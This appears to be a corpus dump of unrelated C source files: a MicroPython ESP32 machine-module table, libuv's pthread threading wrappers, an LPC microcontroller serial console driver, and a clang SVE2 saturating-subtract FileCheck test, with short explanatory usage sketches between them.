    { MP_ROM_QSTR(MP_QSTR_PIN_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_EXT0) },
    { MP_ROM_QSTR(MP_QSTR_EXT0_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_EXT0) },
    { MP_ROM_QSTR(MP_QSTR_EXT1_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_EXT1) },
    { MP_ROM_QSTR(MP_QSTR_TIMER_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_TIMER) },
    { MP_ROM_QSTR(MP_QSTR_TOUCHPAD_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_TOUCHPAD) },
    { MP_ROM_QSTR(MP_QSTR_ULP_WAKE), MP_ROM_INT(ESP_SLEEP_WAKEUP_ULP) },
};

STATIC MP_DEFINE_CONST_DICT(machine_module_globals, machine_module_globals_table);

const mp_obj_module_t mp_module_machine = {
    .base = { &mp_type_module },
    .globals = (mp_obj_dict_t *)&machine_module_globals,
};

#endif // MICROPY_PY_MACHINE
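The globals table above is the module's entire Python-visible surface: each row binds an interned QSTR name to a ROM function object or constant. A minimal sketch of the file's own registration pattern, using a hypothetical machine_example function that is not part of modmachine.c:

/* Sketch: exposing one more C function to Python, following the pattern
 * already used throughout the file above. 'machine_example' is hypothetical. */
STATIC mp_obj_t machine_example(void) {
    return MP_OBJ_NEW_SMALL_INT(42);
}
STATIC MP_DEFINE_CONST_FUN_OBJ_0(machine_example_obj, machine_example);

/* ...plus one extra row in machine_module_globals_table:
 *     { MP_ROM_QSTR(MP_QSTR_example), MP_ROM_PTR(&machine_example_obj) },
 * after which Python code can call machine.example(). */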
294123.c
/* Copyright Joyent, Inc. and other Node contributors. All rights reserved.
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to
 * deal in the Software without restriction, including without limitation the
 * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
 * sell copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
 * IN THE SOFTWARE.
 */

#include "uv.h"
#include "internal.h"

#include <pthread.h>
#include <assert.h>
#include <errno.h>

#include <sys/time.h>

#undef NANOSEC
#define NANOSEC ((uint64_t) 1e9)

struct thread_ctx {
  void (*entry)(void* arg);
  void* arg;
};

static void* uv__thread_start(void *arg) {
  struct thread_ctx *ctx_p;
  struct thread_ctx ctx;

  ctx_p = arg;
  ctx = *ctx_p;
  uv__free(ctx_p);
  ctx.entry(ctx.arg);

  return 0;
}

int uv_thread_create(uv_thread_t *tid, void (*entry)(void *arg), void *arg) {
  struct thread_ctx* ctx;
  int err;

  ctx = uv__malloc(sizeof(*ctx));
  if (ctx == NULL)
    return UV_ENOMEM;

  ctx->entry = entry;
  ctx->arg = arg;

  err = pthread_create(tid, NULL, uv__thread_start, ctx);

  if (err)
    uv__free(ctx);

  return -err;
}

uv_thread_t uv_thread_self(void) {
  return pthread_self();
}

int uv_thread_join(uv_thread_t *tid) {
  return -pthread_join(*tid, NULL);
}

int uv_thread_equal(const uv_thread_t* t1, const uv_thread_t* t2) {
  return pthread_equal(*t1, *t2);
}

int uv_mutex_init(uv_mutex_t* mutex) {
#if defined(NDEBUG) || !defined(PTHREAD_MUTEX_ERRORCHECK)
  return -pthread_mutex_init(mutex, NULL);
#else
  pthread_mutexattr_t attr;
  int err;

  if (pthread_mutexattr_init(&attr))
    abort();

  if (pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_ERRORCHECK))
    abort();

  err = pthread_mutex_init(mutex, &attr);

  if (pthread_mutexattr_destroy(&attr))
    abort();

  return -err;
#endif
}

void uv_mutex_destroy(uv_mutex_t* mutex) {
  if (pthread_mutex_destroy(mutex))
    abort();
}

void uv_mutex_lock(uv_mutex_t* mutex) {
  if (pthread_mutex_lock(mutex))
    abort();
}

int uv_mutex_trylock(uv_mutex_t* mutex) {
  int err;

  err = pthread_mutex_trylock(mutex);

  if (err) {
    if (err != EBUSY && err != EAGAIN)
      abort();
    return -EBUSY;
  }

  return 0;
}

void uv_mutex_unlock(uv_mutex_t* mutex) {
  if (pthread_mutex_unlock(mutex))
    abort();
}

int uv_rwlock_init(uv_rwlock_t* rwlock) {
  return -pthread_rwlock_init(rwlock, NULL);
}

void uv_rwlock_destroy(uv_rwlock_t* rwlock) {
  if (pthread_rwlock_destroy(rwlock))
    abort();
}

void uv_rwlock_rdlock(uv_rwlock_t* rwlock) {
  if (pthread_rwlock_rdlock(rwlock))
    abort();
}

int uv_rwlock_tryrdlock(uv_rwlock_t* rwlock) {
  int err;

  err = pthread_rwlock_tryrdlock(rwlock);

  if (err) {
    if (err != EBUSY && err != EAGAIN)
      abort();
    return -EBUSY;
  }

  return 0;
}

void uv_rwlock_rdunlock(uv_rwlock_t* rwlock) {
  if (pthread_rwlock_unlock(rwlock))
    abort();
}

void uv_rwlock_wrlock(uv_rwlock_t* rwlock) {
  if (pthread_rwlock_wrlock(rwlock))
    abort();
}

int uv_rwlock_trywrlock(uv_rwlock_t* rwlock) {
  int err;

  err = pthread_rwlock_trywrlock(rwlock);

  if (err) {
    if (err != EBUSY && err != EAGAIN)
      abort();
    return -EBUSY;
  }

  return 0;
}

void uv_rwlock_wrunlock(uv_rwlock_t* rwlock) {
  if (pthread_rwlock_unlock(rwlock))
    abort();
}

void uv_once(uv_once_t* guard, void (*callback)(void)) {
  if (pthread_once(guard, callback))
    abort();
}

#if defined(__APPLE__) && defined(__MACH__)

int uv_sem_init(uv_sem_t* sem, unsigned int value) {
  kern_return_t err;

  err = semaphore_create(mach_task_self(), sem, SYNC_POLICY_FIFO, value);
  if (err == KERN_SUCCESS)
    return 0;
  if (err == KERN_INVALID_ARGUMENT)
    return -EINVAL;
  if (err == KERN_RESOURCE_SHORTAGE)
    return -ENOMEM;

  abort();
  return -EINVAL;  /* Satisfy the compiler. */
}

void uv_sem_destroy(uv_sem_t* sem) {
  if (semaphore_destroy(mach_task_self(), *sem))
    abort();
}

void uv_sem_post(uv_sem_t* sem) {
  if (semaphore_signal(*sem))
    abort();
}

void uv_sem_wait(uv_sem_t* sem) {
  int r;

  do
    r = semaphore_wait(*sem);
  while (r == KERN_ABORTED);

  if (r != KERN_SUCCESS)
    abort();
}

int uv_sem_trywait(uv_sem_t* sem) {
  mach_timespec_t interval;
  kern_return_t err;

  interval.tv_sec = 0;
  interval.tv_nsec = 0;

  err = semaphore_timedwait(*sem, interval);
  if (err == KERN_SUCCESS)
    return 0;
  if (err == KERN_OPERATION_TIMED_OUT)
    return -EAGAIN;

  abort();
  return -EINVAL;  /* Satisfy the compiler. */
}

#else /* !(defined(__APPLE__) && defined(__MACH__)) */

int uv_sem_init(uv_sem_t* sem, unsigned int value) {
  if (sem_init(sem, 0, value))
    return -errno;
  return 0;
}

void uv_sem_destroy(uv_sem_t* sem) {
  if (sem_destroy(sem))
    abort();
}

void uv_sem_post(uv_sem_t* sem) {
  if (sem_post(sem))
    abort();
}

void uv_sem_wait(uv_sem_t* sem) {
  int r;

  do
    r = sem_wait(sem);
  while (r == -1 && errno == EINTR);

  if (r)
    abort();
}

int uv_sem_trywait(uv_sem_t* sem) {
  int r;

  do
    r = sem_trywait(sem);
  while (r == -1 && errno == EINTR);

  if (r) {
    if (errno == EAGAIN)
      return -EAGAIN;
    abort();
  }

  return 0;
}

#endif /* defined(__APPLE__) && defined(__MACH__) */

#if defined(__APPLE__) && defined(__MACH__)

int uv_cond_init(uv_cond_t* cond) {
  return -pthread_cond_init(cond, NULL);
}

#else /* !(defined(__APPLE__) && defined(__MACH__)) */

int uv_cond_init(uv_cond_t* cond) {
  pthread_condattr_t attr;
  int err;

  err = pthread_condattr_init(&attr);
  if (err)
    return -err;

#if !(defined(__ANDROID__) && defined(HAVE_PTHREAD_COND_TIMEDWAIT_MONOTONIC))
  err = pthread_condattr_setclock(&attr, CLOCK_MONOTONIC);
  if (err)
    goto error2;
#endif

  err = pthread_cond_init(cond, &attr);
  if (err)
    goto error2;

  err = pthread_condattr_destroy(&attr);
  if (err)
    goto error;

  return 0;

error:
  pthread_cond_destroy(cond);
error2:
  pthread_condattr_destroy(&attr);
  return -err;
}

#endif /* defined(__APPLE__) && defined(__MACH__) */

void uv_cond_destroy(uv_cond_t* cond) {
  if (pthread_cond_destroy(cond))
    abort();
}

void uv_cond_signal(uv_cond_t* cond) {
  if (pthread_cond_signal(cond))
    abort();
}

void uv_cond_broadcast(uv_cond_t* cond) {
  if (pthread_cond_broadcast(cond))
    abort();
}

void uv_cond_wait(uv_cond_t* cond, uv_mutex_t* mutex) {
  if (pthread_cond_wait(cond, mutex))
    abort();
}

int uv_cond_timedwait(uv_cond_t* cond, uv_mutex_t* mutex, uint64_t timeout) {
  int r;
  struct timespec ts;

#if defined(__APPLE__) && defined(__MACH__)
  ts.tv_sec = timeout / NANOSEC;
  ts.tv_nsec = timeout % NANOSEC;
  r = pthread_cond_timedwait_relative_np(cond, mutex, &ts);
#else
  timeout += uv__hrtime(UV_CLOCK_PRECISE);
  ts.tv_sec = timeout / NANOSEC;
  ts.tv_nsec = timeout % NANOSEC;
#if defined(__ANDROID__) && defined(HAVE_PTHREAD_COND_TIMEDWAIT_MONOTONIC)
  /*
   * The bionic pthread implementation doesn't support CLOCK_MONOTONIC,
   * but has this alternative function instead.
   */
  r = pthread_cond_timedwait_monotonic_np(cond, mutex, &ts);
#else
  r = pthread_cond_timedwait(cond, mutex, &ts);
#endif /* __ANDROID__ */
#endif

  if (r == 0)
    return 0;

  if (r == ETIMEDOUT)
    return -ETIMEDOUT;

  abort();
  return -EINVAL;  /* Satisfy the compiler. */
}

#if defined(__APPLE__) && defined(__MACH__)

int uv_barrier_init(uv_barrier_t* barrier, unsigned int count) {
  int err;

  barrier->n = count;
  barrier->count = 0;

  err = uv_mutex_init(&barrier->mutex);
  if (err)
    return -err;

  err = uv_sem_init(&barrier->turnstile1, 0);
  if (err)
    goto error2;

  err = uv_sem_init(&barrier->turnstile2, 1);
  if (err)
    goto error;

  return 0;

error:
  uv_sem_destroy(&barrier->turnstile1);
error2:
  uv_mutex_destroy(&barrier->mutex);
  return -err;
}

void uv_barrier_destroy(uv_barrier_t* barrier) {
  uv_sem_destroy(&barrier->turnstile2);
  uv_sem_destroy(&barrier->turnstile1);
  uv_mutex_destroy(&barrier->mutex);
}

int uv_barrier_wait(uv_barrier_t* barrier) {
  int serial_thread;

  uv_mutex_lock(&barrier->mutex);
  if (++barrier->count == barrier->n) {
    uv_sem_wait(&barrier->turnstile2);
    uv_sem_post(&barrier->turnstile1);
  }
  uv_mutex_unlock(&barrier->mutex);

  uv_sem_wait(&barrier->turnstile1);
  uv_sem_post(&barrier->turnstile1);

  uv_mutex_lock(&barrier->mutex);
  serial_thread = (--barrier->count == 0);
  if (serial_thread) {
    uv_sem_wait(&barrier->turnstile1);
    uv_sem_post(&barrier->turnstile2);
  }
  uv_mutex_unlock(&barrier->mutex);

  uv_sem_wait(&barrier->turnstile2);
  uv_sem_post(&barrier->turnstile2);
  return serial_thread;
}

#else /* !(defined(__APPLE__) && defined(__MACH__)) */

int uv_barrier_init(uv_barrier_t* barrier, unsigned int count) {
  return -pthread_barrier_init(barrier, NULL, count);
}

void uv_barrier_destroy(uv_barrier_t* barrier) {
  if (pthread_barrier_destroy(barrier))
    abort();
}

int uv_barrier_wait(uv_barrier_t* barrier) {
  int r = pthread_barrier_wait(barrier);
  if (r && r != PTHREAD_BARRIER_SERIAL_THREAD)
    abort();
  return r == PTHREAD_BARRIER_SERIAL_THREAD;
}

#endif /* defined(__APPLE__) && defined(__MACH__) */

int uv_key_create(uv_key_t* key) {
  return -pthread_key_create(key, NULL);
}

void uv_key_delete(uv_key_t* key) {
  if (pthread_key_delete(*key))
    abort();
}

void* uv_key_get(uv_key_t* key) {
  return pthread_getspecific(*key);
}

void uv_key_set(uv_key_t* key, void* value) {
  if (pthread_setspecific(*key, value))
    abort();
}
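Usage sketch (not part of thread.c): the public entry points above wrap pthreads so callers never touch pthread types directly; in this vintage of libuv, the wrappers return 0 on success and a negated errno on failure. A minimal example with a thread and a mutex:

#include <stdio.h>
#include "uv.h"

static uv_mutex_t lock;
static int counter;

static void worker(void *arg) {
    (void)arg;
    uv_mutex_lock(&lock);     /* aborts internally on misuse, so no error check */
    counter++;
    uv_mutex_unlock(&lock);
}

int main(void) {
    uv_thread_t tid;
    if (uv_mutex_init(&lock))                    /* 0 on success */
        return 1;
    if (uv_thread_create(&tid, worker, NULL))    /* 0 on success */
        return 1;
    uv_thread_join(&tid);
    uv_mutex_destroy(&lock);
    printf("counter = %d\n", counter);
    return 0;
}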
632149.c
/* LPCUSB, an USB device driver for LPC microcontrollers
   Copyright (C) 2006 Bertrik Sikken (bertrik@sikken.nl)

   Redistribution and use in source and binary forms, with or without
   modification, are permitted provided that the following conditions are met:

   1. Redistributions of source code must retain the above copyright notice,
      this list of conditions and the following disclaimer.
   2. Redistributions in binary form must reproduce the above copyright notice,
      this list of conditions and the following disclaimer in the documentation
      and/or other materials provided with the distribution.
   3. The name of the author may not be used to endorse or promote products
      derived from this software without specific prior written permission.

   THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED
   WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
   MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
   EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
   SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
   PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
   OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
   WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
   OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
   ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

/* Simple console input/output, over serial port #0
   Partially copied from Jim Lynch's tutorial */

#include "console.h"

#define PINSEL0 *(volatile unsigned int *)0xE002C000

#define U0THR   *(volatile unsigned int *)0xE000C000
#define U0RBR   *(volatile unsigned int *)0xE000C000
#define U0DLL   *(volatile unsigned int *)0xE000C000
#define U0DLM   *(volatile unsigned int *)0xE000C004
#define U0FCR   *(volatile unsigned int *)0xE000C008
#define U0LCR   *(volatile unsigned int *)0xE000C00C
#define U0LSR   *(volatile unsigned int *)0xE000C014

/* Initialize Serial Interface */
void ConsoleInit(int iDivider)
{
    PINSEL0 = (PINSEL0 & ~0x0000000F) | 0x00000005;  /* Enable RxD0 and TxD0 */
    U0LCR = 0x83;               /* 8 bits, no Parity, 1 Stop bit */
    U0DLL = iDivider & 0xFF;    /* set divider / baud rate */
    U0DLM = iDivider >> 8;
    U0LCR = 0x03;               /* DLAB = 0 */
    /* enable FIFO */
    U0FCR = 1;
}

/* Write character to Serial Port */
int putchar(int ch)
{
    if (ch == '\n') {
        while (!(U0LSR & 0x20))
            ;
        U0THR = '\r';
    }
    while (!(U0LSR & 0x20))
        ;
    U0THR = ch;
    return ch;
}

int getchar(void)
{
    /* Read character from Serial Port */
    while (!(U0LSR & 0x01))
        ;
    return (U0RBR);
}

int puts(const char *s)
{
    while (*s) {
        putchar(*s++);
    }
    putchar('\n');
    return 1;
}
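Sketch (not part of console.c): deriving the iDivider argument for ConsoleInit(). While DLAB is set, U0DLL/U0DLM hold a 16-bit divisor that divides the UART peripheral clock by 16*baud, the standard 16550-style relation. The 60 MHz PCLK below is an assumption; substitute your board's actual peripheral clock:

#define PCLK_HZ 60000000UL   /* assumed peripheral clock; board-specific */

static int uart0_divider(unsigned long baud)
{
    /* divisor = PCLK / (16 * baud); 60 MHz at 115200 baud gives ~32 */
    return (int)(PCLK_HZ / (16UL * baud));
}

/* e.g. ConsoleInit(uart0_divider(115200)); */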
253323.c
// NOTE: Assertions have been autogenerated by utils/update_cc_test_checks.py
// REQUIRES: aarch64-registered-target
// RUN: %clang_cc1 -triple aarch64-none-linux-gnu -target-feature +sve2 -fallow-half-arguments-and-returns -S -O1 -Werror -Wall -emit-llvm -o - %s | FileCheck %s
// RUN: %clang_cc1 -triple aarch64-none-linux-gnu -target-feature +sve2 -fallow-half-arguments-and-returns -S -O1 -Werror -Wall -emit-llvm -o - -x c++ %s | FileCheck %s -check-prefix=CPP-CHECK
// RUN: %clang_cc1 -DSVE_OVERLOADED_FORMS -triple aarch64-none-linux-gnu -target-feature +sve2 -fallow-half-arguments-and-returns -S -O1 -Werror -Wall -emit-llvm -o - %s | FileCheck %s
// RUN: %clang_cc1 -DSVE_OVERLOADED_FORMS -triple aarch64-none-linux-gnu -target-feature +sve2 -fallow-half-arguments-and-returns -S -O1 -Werror -Wall -emit-llvm -o - -x c++ %s | FileCheck %s -check-prefix=CPP-CHECK
// RUN: %clang_cc1 -triple aarch64-none-linux-gnu -target-feature +sve -fallow-half-arguments-and-returns -fsyntax-only -verify -verify-ignore-unexpected=error %s
// RUN: %clang_cc1 -DSVE_OVERLOADED_FORMS -triple aarch64-none-linux-gnu -target-feature +sve -fallow-half-arguments-and-returns -fsyntax-only -verify=overload -verify-ignore-unexpected=error %s
#include <arm_sve.h>

#ifdef SVE_OVERLOADED_FORMS
// A simple used,unused... macro, long enough to represent any SVE builtin.
#define SVE_ACLE_FUNC(A1,A2_UNUSED,A3,A4_UNUSED) A1##A3
#else
#define SVE_ACLE_FUNC(A1,A2,A3,A4) A1##A2##A3##A4
#endif

// CHECK-LABEL: @test_svqsub_s8_z(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer)
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP0]], <vscale x 16 x i8> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z16test_svqsub_s8_zu10__SVBool_tu10__SVInt8_tu10__SVInt8_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer)
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP0]], <vscale x 16 x i8> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP1]]
//
svint8_t test_svqsub_s8_z(svbool_t pg, svint8_t op1, svint8_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s8_z'}}
  return SVE_ACLE_FUNC(svqsub,_s8,_z,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s16_z(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer)
// CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP1]], <vscale x 8 x i16> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP2]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s16_zu10__SVBool_tu11__SVInt16_tu11__SVInt16_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer)
// CPP-CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP1]], <vscale x 8 x i16> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP2]]
//
svint16_t test_svqsub_s16_z(svbool_t pg, svint16_t op1, svint16_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s16_z'}}
  return SVE_ACLE_FUNC(svqsub,_s16,_z,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s32_z(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer)
// CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP1]], <vscale x 4 x i32> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP2]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s32_zu10__SVBool_tu11__SVInt32_tu11__SVInt32_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 4 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv4i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sel.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[OP1:%.*]], <vscale x 4 x i32> zeroinitializer)
// CPP-CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 4 x i32> @llvm.aarch64.sve.sqsub.nxv4i32(<vscale x 4 x i1> [[TMP0]], <vscale x 4 x i32> [[TMP1]], <vscale x 4 x i32> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 4 x i32> [[TMP2]]
//
svint32_t test_svqsub_s32_z(svbool_t pg, svint32_t op1, svint32_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s32_z'}}
  return SVE_ACLE_FUNC(svqsub,_s32,_z,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_s64_z(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer)
// CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP1]], <vscale x 2 x i64> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP2]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_s64_zu10__SVBool_tu11__SVInt64_tu11__SVInt64_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 2 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv2i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sel.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[OP1:%.*]], <vscale x 2 x i64> zeroinitializer)
// CPP-CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 2 x i64> @llvm.aarch64.sve.sqsub.nxv2i64(<vscale x 2 x i1> [[TMP0]], <vscale x 2 x i64> [[TMP1]], <vscale x 2 x i64> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 2 x i64> [[TMP2]]
//
svint64_t test_svqsub_s64_z(svbool_t pg, svint64_t op1, svint64_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_s64_z'}}
  return SVE_ACLE_FUNC(svqsub,_s64,_z,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u8_z(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer)
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP0]], <vscale x 16 x i8> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP1]]
//
// CPP-CHECK-LABEL: @_Z16test_svqsub_u8_zu10__SVBool_tu11__SVUint8_tu11__SVUint8_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.sel.nxv16i8(<vscale x 16 x i1> [[PG:%.*]], <vscale x 16 x i8> [[OP1:%.*]], <vscale x 16 x i8> zeroinitializer)
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 16 x i8> @llvm.aarch64.sve.uqsub.nxv16i8(<vscale x 16 x i1> [[PG]], <vscale x 16 x i8> [[TMP0]], <vscale x 16 x i8> [[OP2:%.*]])
// CPP-CHECK-NEXT:    ret <vscale x 16 x i8> [[TMP1]]
//
svuint8_t test_svqsub_u8_z(svbool_t pg, svuint8_t op1, svuint8_t op2)
{
  // overload-warning@+2 {{implicit declaration of function 'svqsub_z'}}
  // expected-warning@+1 {{implicit declaration of function 'svqsub_u8_z'}}
  return SVE_ACLE_FUNC(svqsub,_u8,_z,)(pg, op1, op2);
}

// CHECK-LABEL: @test_svqsub_u16_z(
// CHECK-NEXT:  entry:
// CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer)
// CHECK-NEXT:    [[TMP2:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.uqsub.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[TMP1]], <vscale x 8 x i16> [[OP2:%.*]])
// CHECK-NEXT:    ret <vscale x 8 x i16> [[TMP2]]
//
// CPP-CHECK-LABEL: @_Z17test_svqsub_u16_zu10__SVBool_tu12__SVUint16_tu12__SVUint16_t(
// CPP-CHECK-NEXT:  entry:
// CPP-CHECK-NEXT:    [[TMP0:%.*]] = call <vscale x 8 x i1> @llvm.aarch64.sve.convert.from.svbool.nxv8i1(<vscale x 16 x i1> [[PG:%.*]])
// CPP-CHECK-NEXT:    [[TMP1:%.*]] = call <vscale x 8 x i16> @llvm.aarch64.sve.sel.nxv8i16(<vscale x 8 x i1> [[TMP0]], <vscale x 8 x i16> [[OP1:%.*]], <vscale x 8 x i16> zeroinitializer)
